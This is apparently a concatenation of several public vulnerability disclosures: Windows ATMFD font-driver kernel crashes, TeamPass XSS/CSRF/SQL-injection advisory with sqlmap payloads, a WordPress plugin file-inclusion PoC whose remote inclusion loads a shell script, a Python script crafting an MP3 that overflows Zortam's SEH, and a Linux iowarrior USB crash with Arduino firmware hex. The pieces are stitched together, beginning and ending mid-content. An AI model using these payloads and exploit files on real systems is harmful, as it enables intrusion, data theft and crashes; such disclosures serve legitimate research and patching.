0c2cc830 60c6cc72 MSHTML!GlobalWndOnMethodCall+0x17b
0c2cc884 757d8e71 MSHTML!GlobalWndProc+0x103
0c2cc8b0 757d90d1 user32!_InternalCallWinProc+0x2b
0c2cc944 757da62a user32!UserCallWinProcCheckWow+0x18e
0c2cc9b8 757da680 user32!DispatchMessageWorker+0x473
0c2cc9c4 6207a77c user32!DispatchMessageW+0x10
0c2cfb94 620edf88 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
0c2cfc54 7201ebec IEFRAME!LCIETab_ThreadProc+0x3e7
0c2cfc6c 67d73a31 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
0c2cfca4 67f99608 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
WARNING: Stack unwind information not available. Following frames may be wrong.
0c2cfce0 75a77c04 vfbasics+0x19608
0c2cfcf4 77a1ad5f KERNEL32!BaseThreadInitThunk+0x24
0c2cfd3c 77a1ad2a ntdll_779c0000!__RtlUserThreadStart+0x2f
0c2cfd4c 00000000 ntdll_779c0000!_RtlUserThreadStart+0x1b
-->
Source: https://code.google.com/p/google-security-research/issues/detail?id=682
We have encountered a Windows kernel crash in the ATMFD.DLL OpenType driver while processing a corrupted OTF font file:
---
DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer. This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned. This is the classic "buffer overrun"
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments:
Arg1: a6703535, Actual security check cookie from the stack
Arg2: 98ee9e09, Expected security check cookie
Arg3: 671161f6, Complement of the expected security check cookie
Arg4: 00000000, zero
Debugging Details:
------------------
DEFAULT_BUCKET_ID: VERIFIER_ENABLED_VISTA_MINIDUMP
SECURITY_COOKIE: Expected 98ee9e09 found a6703535
CUSTOMER_CRASH_COUNT: 1
BUGCHECK_STR: 0xF7
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 98ea5720 to 82725b84
STACK_TEXT:
a6723488 98ea5720 000000f7 a6703535 98ee9e09 nt!KeBugCheckEx+0x1e
WARNING: Stack unwind information not available. Following frames may be wrong.
a67234a8 98ec57f6 00000085 00400000 08680370 ATMFD+0x15720
a672353c 98ec5b0e 00400000 a6723790 00400000 ATMFD+0x357f6
a6723610 8297ef90 ff68a000 00000000 ff68a000 ATMFD+0x35b0e
a6723624 99180853 3e9ca839 a6723734 98ec5063 nt!VerifierExFreePoolWithTag+0x30
a6723638 00400000 a672364c a6723790 a6723868 win32k!VerifierEngFreeMem+0x5b
a6723790 98e95328 98e953b4 98e953be 98e95442 0x400000
a67237c8 00000000 00001f98 00000000 00000000 ATMFD+0x5328
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "CFF " table.
The immediate reason of the bugcheck is a stack corruption detected by the stack cookie protection (/GS). The issue reproduces on Windows 7 and 8.1; other platforms were not tested. In our environment, it is sufficient to open the offending font in the default Windows Font Viewer to reproduce the crash, or even click on a folder icon containing the font in Windows Explorer.
Attached is an archive with the proof-of-concept mutated OTF file, together with the original font used to generate it and a corresponding crash log from Windows 7 32-bit.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39561.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=683
We have encountered a Windows kernel crash in the ATMFD.DLL OpenType driver while processing a corrupted OTF font file:
---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fb6f5000, memory referenced
Arg2: 00000001, value 0 = read operation, 1 = write operation
Arg3: 99053e40, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
WRITE_ADDRESS: GetPointerFromAddress: unable to read from 827ae84c
Unable to read MiSystemVaType memory at 8278d780
fb6f5000
FAULTING_IP:
ATMFD+33e40
99053e40 890c82 mov dword ptr [edx+eax*4],ecx
MM_INTERNAL_CODE: 0
CUSTOMER_CRASH_COUNT: 1
DEFAULT_BUCKET_ID: VERIFIER_ENABLED_VISTA_MINIDUMP
BUGCHECK_STR: 0xD6
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 99054677 to 99053e40
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
b603ecb0 99054677 fb472880 fb6f438c 00000f5c ATMFD+0x33e40
b603ece4 99054776 fb6f4380 00000003 fb6f438c ATMFD+0x34677
b603ed0c 99049fb3 fb472800 fc5b60b8 990663ec ATMFD+0x34776
b603ed30 9904eaf5 fc704c70 990663ec 00000f5c ATMFD+0x29fb3
b603f444 9904f85f fc704c70 9905f028 b603f690 ATMFD+0x2eaf5
b603f500 9904286e fc704c70 9905f028 b603f690 ATMFD+0x2f85f
b603f5ec 99042918 fc704c70 b603f690 b603f714 ATMFD+0x2286e
b603f618 990333d2 fc704c70 9905f028 b603f690 ATMFD+0x22918
b603f77c 990337a9 00000000 b603f89c fb6bcc80 ATMFD+0x133d2
b603f7d0 990240ff 00000000 b603f89c 00000000 ATMFD+0x137a9
b603f824 9918de12 ff7a5010 fb562cf0 00000001 ATMFD+0x40ff
b603f86c 9917687d ff7a5010 fb562cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
b603f8e0 991a1653 ffa6a130 fb588b54 0000004c win32k!xInsertMetricsRFONTOBJ+0x9c
b603f914 991a3735 00000020 b603f9fc b603fb8c win32k!RFONTOBJ::bGetGlyphMetrics+0x131
b603fbb8 991b6856 17010459 00000060 00000040 win32k!GreGetCharABCWidthsW+0x147
b603fc14 8267fa06 17010459 00000040 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
b603fc14 776771b4 17010459 00000040 00000040 nt!KiSystemServicePostCall
02dde7ac 00000000 00000000 00000000 00000000 0x776771b4
---
The crash always occurs while trying to write outside of a dynamically allocated destination buffer, leading to a pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "CFF " table.
The issue reproduces on Windows 7 and 8.1; other platforms were not tested. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in ATMFD.DLL or another location in kernel space, as caused by the corrupted pool state.
Attached is an archive with the proof-of-concept mutated OTF file, together with the original font used to generate it and a corresponding crash log from Windows 7 32-bit.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39560.zip
Affected Product: TeamPass
Vulnerability Type: Multiple XSS,CSRF, SQL injections
Fixed in Version: 2.1.25 (https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.25.0)
Vendor Website: http://www.teampass.net
Software Link: : https://github.com/nilsteampassnet/TeamPass
Affected Version: 2.1.24 and prior
Vulnerable software (including source) : https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.24.4
Google Dork: intitle:"Teampass" + inurl:index.php?page=items
Tested on: Ubuntu
Remote Exploitable: Yes
Reported to vendor: 30 december 2015
Disclosed to public: 14 March 2016
Release mode: Responsible Disclosure
CVE-2015-7562 TeamPass 2.1.24 Persistant XSS
CVE-2015-7563 TeamPass 2.1.24 CSRF
CVE-2015-7564 TeamPass 2.1.24 SQL Injection
Credits: Vincent Malguy
Description :
TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any server Apache, MySQL and PHP. It is especially designed to provide passwords access security for allowed people. This makes TeamPass really useful in a Business/Enterprise environment and will provide to IT or Team Manager a powerful and easy tool for customizing passwords access depending on the user’s role.
Copyright (c) 2009-2015, Nils Laumaillé
********************* CVE-2015-7562 TeamPass 2.1.24 Persistant XSS *********************
When displaying the detail of an item (a password entry), the "label" value is display using the stripslashes() sanitization function. This function does not efficiently prevent XSS.
POC of a persistant XSS : add item with label : $str = "' onclick='javascript:alert("XSS found");' alt='";echo "<a href='". strip_tags($str) ."'></a>";
This xss will be trigger each time a user click on this item.
As item can be share, there is a way for a user to trick an admin to trigger this xss.
fix in commit cd112ea (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
POC of a persistant XSS :
Add a new role with name : <script>alert("XSS");</script>
This xss will be trigger in many admin pages
Fix in commit : 3f0a6c9 & e29cd54 & 295cada & 2c8a829 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
********************* CVE-2015-7563 TeamPass 2.1.24 CSRF *********************
Lack of anti-CSRF token lead to security vulnerabilities where an attacker can trick a authenticated user to do some unwanted action on his behalf :
<form action="http://<teampass host>/sources/main.queries.php" method="post">
<select name="type">
<option value="increase_session_time »>will add 1 hour timeout to the user session</option>
</select>
<input type=submit>
</form>
recommanded fix: add anti-CSRF token.
********************* CVE-2015-7564 TeamPass 2.1.24 SQL Injections *********************
SQL injection has been found in item.query.php parameter id with type set to action_on_quick_icon.
Sqlmap output :
---
Parameter: id (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: type=action_on_quick_icon&id=(SELECT (CASE WHEN (6144=6144) THEN 6144 ELSE 6144*(SELECT 6144 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action=1
—
fix in commit 795256f (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
SQL injections has been found in view.query.php in parameters order and direction with type set to connections_logs, errors_logs or access_logs .
Note that direction need to be prefixed by ", " in order to be exploitable
Sqlmap output for connections_logs:
---
Parameter: order (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: type=connections_logs&order=(SELECT (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: type=connections_logs&order=date AND (SELECT * FROM (SELECT(SLEEP(5)))vhPw)&direction=DESC
—
---
Parameter: direction (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: type=errors_logs&order=date&direction=, (SELECT (CASE WHEN (1739=1739) THEN 1739 ELSE 1739*(SELECT 1739 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
—
fix commit 86719e0 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
# Exploit Title: Wordpress Site Import 1.0.1 | Local and Remote file inclusion
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/site-import.1.0.1.zip
# Version: 1.0.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
/wp-content/plugins/site-import/readme.txt
======================================
[PoC]
======================================
Remote File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
======================================
#-*- coding: utf-8 -*-
#
# Exploit Title : Zortam Mp3 Media Studio 20.15 - SEH overflow DOS
# Date: 2016-03-12
# Author: INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# GitHub : binsect00
# Blog : http://binsect00.tistory.com
# Vendor Homepage : http://www.zortam.com
# Software Link: http://www.zortam.com/download.html
# Version: 20.15
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
#
# Detail..
# 1. Zortam Mp3 Media Studio is program that change tags sound file
# 2. If tag length over certain length, program is occured crash.
# 3. Make mp3 file. title tag length is 3000.
# 4. program open. and serching Directory
id3Id = '\x49\x44\x33' #ID3
id3Version = '\x03\x00'
id3Flag = '\x00'
id3Size = '\x00\x00\x2F\x2D'
id3 = id3Id + id3Version + id3Flag + id3Size
frameId = '\x54\x49\x54\x32' #TIT2
frameSize = '\x00\x00\x0B\xB9' #Frame Size
frameFlag = '\x00\x00'
textEncoding = '\x00'
textInfo = 'A'*3000
frame = frameId + frameSize + frameFlag + textEncoding + textInfo
padding = '\x00'*1100
payload = id3 + frame + padding
with open('Zortam Mp3 Media Studio 20.15 DOS Vulnerabilities.mp3','wb') as f:
f.write(payload)
'''
STATUS_STACK_BUFFER_OVERRUN encountered
(aa4.c08): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=743b74ec ecx=7619e28c edx=0012e4a9 esi=00000000 edi=756d6640
eip=7619e109 esp=0012e6f0 ebp=0012e76c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\kernel32.dll -
kernel32!FormatMessageA+0x14031:
7619e109 cc int 3
0:000> !exchain
0012e75c: kernel32!RegSaveKeyExA+3e9 (761ca022)
0012f2b8: 41414141
Invalid exception stack at 41414141
'''
OS-S Security Advisory 2016-15
Linux iowarrior Nullpointer Dereference
Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
USB device descriptors (iowarrior driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of advisory: https://os-s.net//advisories/OSS-2016-15_iowarrior.pdf
Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
device requiring the iowarrior driver.
Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.
Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:
[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x7c0
idProduct: 0x1500
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1
This is the configuration descriptor containing the malicious value for
bNumEndpoints causing the crash. A zero value for bNumEndpoints crashes the
system.
[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x0
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81
bmAttribut: 0x3
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1
bmAttribut: 0x2
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82
bmAttribut: 0x1
wMaxPacketSize: 0x4
bInterval: 0xc
The iowarrior driver assumes that there will be at least one IN-endpoint-
descriptor.
If the interface-descriptor contains a zero-value for bNumEndpoints or no IN-
endpoint-descriptor is provided, the driver tries to dereference a null-
pointer and the kernel crashes:
****
$ nm iowarrior.ko.debug | grep iowarrior_probe
00000000000012a0 t iowarrior_probe
$ addr2line -e iowarrior.ko.debug 0x13D4
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
64/include/uapi/linux/usb/ch9.h:605
****
**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (includes/uapi/linux/usb/ch9.c)
...
603 static inline int usb_endpoint_maxp(const struct usb_endpoint_descriptor
*epd) /* used by iowarrior_probe */
604 {
605 return __le16_to_cpu(epd->wMaxPacketSize); /* Possible Nullpointer
Dereference */
606 }
...
****
**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/misc/iowarrior.c)
...
790 /* set up the endpoint information */
791 for (i = 0; i < iface_desc->desc.bNumEndpoints; ++i) {
792 endpoint = &iface_desc->endpoint[i].desc;
793
794 if (usb_endpoint_is_int_in(endpoint))
795 dev->int_in_endpoint = endpoint; /* Nullpointer if never set */
796 if (usb_endpoint_is_int_out(endpoint))
797 /* this one will match for the IOWarrior56 only */
798 dev->int_out_endpoint = endpoint;
799 }
800 /* we have to check the report_size often, so remember it in the
endianness suitable for our machine */
801 dev->report_size = usb_endpoint_maxp(dev->int_in_endpoint); /* Nullpointer
if never set */
802 if ((dev->interface->cur_altsetting->desc.bInterfaceNumber == 0) &&
803 (dev->product_id == USB_DEVICE_ID_CODEMERCS_IOW56))
804 /* IOWarrior56 has wMaxPacketSize different from report size */
805 dev->report_size = 7;
...
****
Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.
avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
flash:w:binary.hex
The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!
Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.
Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
To this day, no security patch was provided by the vendor.
Since our 90-day Responsible Discourse deadline is expired, we publish this
Security Advisory.
References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283390
Kernel Stacktrace:
[ 34.458988] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 34.662073] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint
descriptors, different from the interface descriptor's value: 0
[ 34.694667] usb 1-1: New USB device found, idVendor=07c0, idProduct=1500
[ 34.701412] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 34.709475] usb 1-1: Product: Ä?
[ 34.713214] usb 1-1: Manufacturer: Ä?
[ 34.717062] usb 1-1: SerialNumber: %
[ 34.779320] BUG: unable to handle kernel NULL pointer dereference at
0000000000000004
[ 34.780026] IP: [<ffffffffa03943d4>] iowarrior_probe+0x134/0x4a0 [iowarrior]
[ 34.780026] PGD 0
[ 34.780026] Oops: 0000 [#1] SMP
[ 34.780026] Modules linked in: iowarrior(+) ip6t_rpfilter ip6t_REJECT
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 34.780026] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 34.780026] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 34.780026] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 34.780026] RIP: 0010:[<ffffffffa03943d4>] [<ffffffffa03943d4>]
iowarrior_probe+0x134/0x4a0 [iowarrior]
[ 34.780026] RSP: 0018:ffff88000bd23b98 EFLAGS: 00010246
[ 34.780026] RAX: 0000000000000000 RBX: ffff88000bd36600 RCX: 0000000000000000
[ 34.780026] RDX: 0000000000000000 RSI: 0000000000001500 RDI: ffff88000bd36688
[ 34.780026] RBP: ffff88000bd23be0 R08: 0000000000016460 R09: ffff88000e401700
[ 34.780026] R10: ffffffffa03942d3 R11: ffffffff810020d8 R12: ffff88000c525800
[ 34.780026] R13: ffff88000bcd0090 R14: ffff88000bcd0000 R15: ffff88000f508bc8
[ 34.780026] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 34.780026] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 34.780026] CR2: 0000000000000004 CR3: 000000000c448000 CR4:
00000000000006f0
[ 34.780026] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 34.780026] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 34.780026] Stack:
[ 34.780026] ffff88000c525830 ffff88000bd23be0 ffffffff813dfba2 ffff88000af01800
[ 34.780026] ffff88000bcd0090 ffff88000bcd0000 ffffffffa03960c8 ffff88000c525830
[ 34.780026] ffffffffa0395500 ffff88000bd23c28 ffffffff8141dc04 000000000bd23c00
[ 34.780026] Call Trace:
[ 34.780026] [<ffffffff813dfba2>] ? __pm_runtime_set_status+0x132/0x210
[ 34.780026] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 34.780026] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 34.780026] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 34.780026] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 34.780026] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 34.780026] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 34.780026] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[ 34.780026] [<ffffffff813d3b34>] driver_register+0x64/0xf0
[ 34.780026] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[ 34.780026] [<ffffffffa0399000>] ? 0xffffffffa0398fff
[ 34.780026] [<ffffffffa039901e>] iowarrior_driver_init+0x1e/0x1000 [iowarrior]
[ 34.780026] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 34.780026] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 34.780026] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 34.780026] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 34.780026] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 34.780026] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 34.780026] Code: 0c c8 0f b6 41 03 83 e0 03 3c 03 75 da 80 79 02 00 0f 88
10 02 00 00 48 89 4b 40 41 0f b6 47 04 83 c2 01 39 d0 7f cc 48 8b 43 48 <0f>
b7 40 04 89 83 c8 00 00 00 49 8b 44 24 08 80 78 02 00 0f 84
[ 34.780026] RIP [<ffffffffa03943d4>] iowarrior_probe+0x134/0x4a0 [iowarrior]
[ 34.780026] RSP <ffff88000bd23b98>
[ 34.780026] CR2: 0000000000000004
[ 35.199537] ---[ end trace b239663354a1c556 ]---
[ 35.205081] Kernel panic - not syncing: Fatal exception
[ 35.206054] drm_kms_helper: panic occurred, switching back to text console
Arduino Leonardo Firmware:
:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C2050C942D04CE
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940C02C3
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C50009030C0306
:1000B000FF0203032D032D032D0310031403180364
:1000C0001E0322032D0328030000000200080E0077
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E0EDF3E102C005900D92A436B107D5
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9402070C940000089547
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E949F020E94C70060E06D
:1001B00083E00E942E0361E087E00E942E0361E04D
:1001C00088E00E942E030E9457067E012AE9E20E73
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93F90168
:1002C0009082E4E0D9011196EC93F901DC01292D2B
:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB
:1002E0001B96FC93EE931A971D96BC92AE921C97A8
:1002F0001183008373836283558344830C521109F5
:100300002CE0F80111922A95E9F721E0D80119961D
:100310002C931997FE01E059FF4F01900D929A948A
:10032000E1F7F8019387828761E088E00E94670324
:100330008BE492E00E94630688E892E00E946306E4
:1003400087EC92E00E94630686E093E00E946306D9
:1003500082E493E00E9463068FE793E00E946306C5
:1003600084EA93E00E9463068BEE93E00E946306AA
:1003700083E00E949D03892B09F047C05E01F3E2F0
:10038000AF0EB11C8824839482E1982E84E194E01E
:100390000E946306BF92AF92DF92CF92FF92EF92DC
:1003A0001F928F921F930F932DB73EB722513109A1
:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6
:1003C000FE01FB96892D01900D928A95E1F78DE64D
:1003D00095E00E94010668E873E180E090E00E94E9
:1003E00079028DE695E00E944C0660E087E00E946D
:1003F000670368E873E180E090E00E9479020FB63D
:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0
:1004100090E00E947902ACCF1F920F920FB60F921C
:1004200011242F933F938F939F93AF93BF9380910A
:10043000650590916605A0916705B09168053091BA
:10044000640523E0230F2D3720F40196A11DB11D73
:1004500005C026E8230F0296A11DB11D2093640557
:100460008093650590936605A0936705B093680532
:100470008091690590916A05A0916B05B0916C051A
:100480000196A11DB11D8093690590936A05A09303
:100490006B05B0936C05BF91AF919F918F913F9188
:1004A0002F910F900FBE0F901F9018953FB7F894A3
:1004B0008091690590916A05A0916B05B0916C05DA
:1004C00026B5A89B05C02F3F19F00196A11DB11DAF
:1004D0003FBF6627782F892F9A2F620F711D811DCC
:1004E000911D42E0660F771F881F991F4A95D1F72B
:1004F0000895CF92DF92EF92FF92CF93DF936B013B
:100500007C010E945602EB01C114D104E104F10404
:1005100079F00E9456026C1B7D0B683E7340A0F37D
:1005200081E0C81AD108E108F108C851DC4FECCFCE
:10053000DF91CF91FF90EF90DF90CF900895789466
:1005400084B5826084BD84B5816084BD85B58260D8
:1005500085BD85B5816085BDEEE6F0E08081816076
:100560008083E1E8F0E01082808182608083808176
:1005700081608083E0E8F0E0808181608083E1E950
:10058000F0E0808182608083808181608083E0E907
:10059000F0E0808181608083E1ECF0E08081846024
:1005A0008083808182608083808181608083E3ECAE
:1005B000F0E0808181608083E0ECF0E08081826007
:1005C0008083E2ECF0E0808181608083EAE7F0E004
:1005D000808184608083808182608083808181606B
:1005E0008083808180688083089590E0FC0131974A
:1005F000EE30F10590F5EA5AFF4F0C94A90980916D
:1006000080008F7703C0809180008F7D8093800071
:10061000089584B58F7702C084B58F7D84BD089519
:10062000809190008F7707C0809190008F7D03C0EC
:1006300080919000877F8093900008958091C00002
:100640008F7703C08091C0008F7D8093C000089594
:100650008091C200877F8093C2000895CF93DF937B
:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A
:100670008491882349F190E0880F991FFC01E25C86
:10068000FE4FA591B491805D9E4FFC01C591D49120
:100690009FB7611108C0F8948C91209582238C93A8
:1006A000888182230AC0623051F4F8948C91322FF1
:1006B000309583238C938881822B888304C0F8949F
:1006C0008C91822B8C939FBFDF91CF9108950F93D4
:1006D0001F93CF93DF931F92CDB7DEB7282F30E063
:1006E000F901E853FF4F8491F901EA51FF4F14914A
